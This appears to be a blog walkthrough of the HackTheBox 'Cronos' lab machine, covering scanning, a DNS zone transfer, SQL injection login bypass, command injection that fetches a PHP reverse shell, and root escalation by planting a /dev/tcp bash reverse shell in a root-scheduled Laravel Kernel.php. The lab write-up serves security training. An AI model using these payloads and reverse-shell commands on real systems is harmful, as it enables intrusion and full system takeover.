HackTheBox: Cronos

The first step was to run Nmap against the machine to identity running services:

# Nmap 7.91 scan initiated Mon Dec  7 13:46:38 2020 as: nmap -p- -sV -O -sV -oN scan 10.10.10.13
Nmap scan report for 10.10.10.13
Host is up (0.045s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 4.8 (92%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec  7 14:05:38 2020 -- 1 IP address (1 host up) scanned in 1140.30 seconds

From the output we can see that SSH, DNS and HTTP are running. I started by browsing to port 80 and was greeted with the Apache default page.

I ran DIRB on the web server but nothing significant was found. I next decided to move onto DNS. I modified my /etc/resolve.conf adding the CronOS machine to it. This allowed me to make DNS requests to the DNS server.

┌──(root💀kali)-[/home/kali/Documents/cronos]
└─# cat /etc/resolv.conf                                                                                                                                                                                                               1 ⚙
# Generated by NetworkManager
search lan
#nameserver 192.168.1.254
nameserver 10.10.10.13

I then tried performing a zone transfer on the DNS server to see what records existed on the server.

┌──(root💀kali)-[/home/kali/Documents/cronos]
└─# dig axfr @10.10.10.13 cronos.htb                                                                                                                                                                                                   9 ⨯

; <<>> DiG 9.16.8-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 80 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Mon Dec 07 14:23:11 EST 2020
;; XFR size: 7 records (messages 1, bytes 203)

You can see from the output that multiple records were discovered, including admin.cronos.htb and cronos.htb. I browsed to admin.cronos.htb and was greeted with this page:

I tried some simple login credentials but was unsuccessful. I tried performing SQL injection on the username field, including some of the examples provided on THIS website. I discovered after some trial and error that admin' or 1=1# was successful and allowed me to login to a Net Tool v0.1 interface. This interface allows you to run traceroute and ping through the browser. I opened up the burp suite and captured one of the HTTP requests for the ping command, then sent it to the repeater.

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://admin.cronos.htb
Connection: close
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=j6fscnmbuv18t98equvitii2t5
Upgrade-Insecure-Requests: 1

command=ping+-c+1&host=10.10.14.19

You can see the command being run in the command parameter at the bottom. I modified this parameter to wget a php reverse shell from my Kali machine. I started by copying php-reverse-shell.php from /usr/share/webshells/php into /var/www. Then modifying the webshell so it pointed back to my Kali machine. The HTTP request was then modified to download this PHP reverse shell.

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://admin.cronos.htb
Connection: close
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=j6fscnmbuv18t98equvitii2t5
Upgrade-Insecure-Requests: 1

command=wget http://10.10.14.19:8000/shelly.vba&host=10.10.14.19

Once this was sent to the server, I then sent the command “pwd” to find which director the reverse shell was saved to.

HTTP/1.1 200 OK

Date: Thu, 10 Dec 2020 20:18:44 GMT

Server: Apache/2.4.18 (Ubuntu)

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 462

Connection: close

Content-Type: text/html; charset=UTF-8



<html">
   
   <head>
      <title>Net Tool v0.1 </title>
   </head>
   
   <body>
  <h1>Net Tool v0.1</h1>
  <form method="POST" action="">
  <select name="command">
    <option value="traceroute">traceroute</option>
    <option value="ping -c 1">ping</option>
  </select>
  <input type="text" name="host" value="8.8.8.8"/>
  <input type="submit" value="Execute!"/>
  </form>
      /var/www/admin<br>
          <p><a href = "logout.php">Sign Out</a></p>
   </body>
   
</html>

You can see from the output that it was saved to /var/www/admin. So I started a Netcat listener on port 2600 as I specified in the php reverse shell.

┌──(root💀kali)-[/usr/share/webshells/php]
└─# nc -nvlp 2600                                                                                                                                                                                                                      1 ⚙
listening on [any] 2600 ...

I then browsed to http://admin.cronos.htb/phprev.php, the reverse shell was successfully captured by Netcat:

┌──(root💀kali)-[/usr/share/wordlists/SecLists/Usernames]
└─# nc -nvlp 2600                                                                                                                                                                                                                  1 ⨯ 2 ⚙
listening on [any] 2600 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.13] 42538
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 21:31:58 up 1 day, 10 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

As you can see from the output I was logged in as www-data. I was able to navigate to the user flag successfully.

$ cd /home
$ ls
noulis
$ cd noulis
$ ls
user.txt
$ cat user.txt
[REDACTED]
$ 

The next step was to escalate privileges. I downloaded from my Kali machine LinPEAS using wget. I then ran the script on the CronOS machine. Browsing the output I discovered a line in particular:

* * * * *       root   php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

This is showing that the root user is executing a scheduled task through Laravels artisan and piping the output to devnull. After doing some research on how this process works, I discovered THIS website which explains how to setup a task. Following this guide I navigated to cd /var/www/laravel/app/Console. Then modified the Kernel.php file to contain the following:

<?php

namespace App\Console;

use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;

class Kernel extends ConsoleKernel
{
    /**
     * The Artisan commands provided by your application.
     *
     * @var array
     */
    protected $commands = [
        //
    ];

    /**
     * Define the application's command schedule.
     *
     * @param  \Illuminate\Console\Scheduling\Schedule  $schedule
     * @return void
     */
    protected function schedule(Schedule $schedule)
    {
        $schedule->exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.19/2700 0>&1'");
        //          ->everyMinute();
    }

    /**
     * Register the Closure based commands for the application.
     *
     * @return void
     */
    protected function commands()
    {
        require base_path('routes/console.php');
    }
}

The function that i modified was the schedule function. This was set to run the command “/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.19/2700 0>&1′” every minute. This creates a reverse shell back to the Kali machine.

Once this new Kernel.php file was saved, i started a netcat listener on port 2700 and waiting for the schedule task to run as the root user. After 1 minute a shell was captured.

┌──(root💀kali)-[/var/www]
└─# nc -nvlp 2700                                                                                                                                                                                                                      1 ⨯
listening on [any] 2700 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.13] 44890
bash: cannot set terminal process group (23152): Inappropriate ioctl for device
bash: no job control in this shell
root@cronos:/var/www/laravel# whoami
whoami
root
root@cronos:/var/www/laravel# cd /root
cd /root
root@cronos:~# ls
ls
root.txt
root@cronos:~# cat root.txt
cat root.txt
[REDACTED]
root@cronos:~#         

From the output of the reverse shell, you can see that is successfully spawned a root shell, and i was able to navigate and display the root flag.

Leave a Reply

Your email address will not be published. Required fields are marked *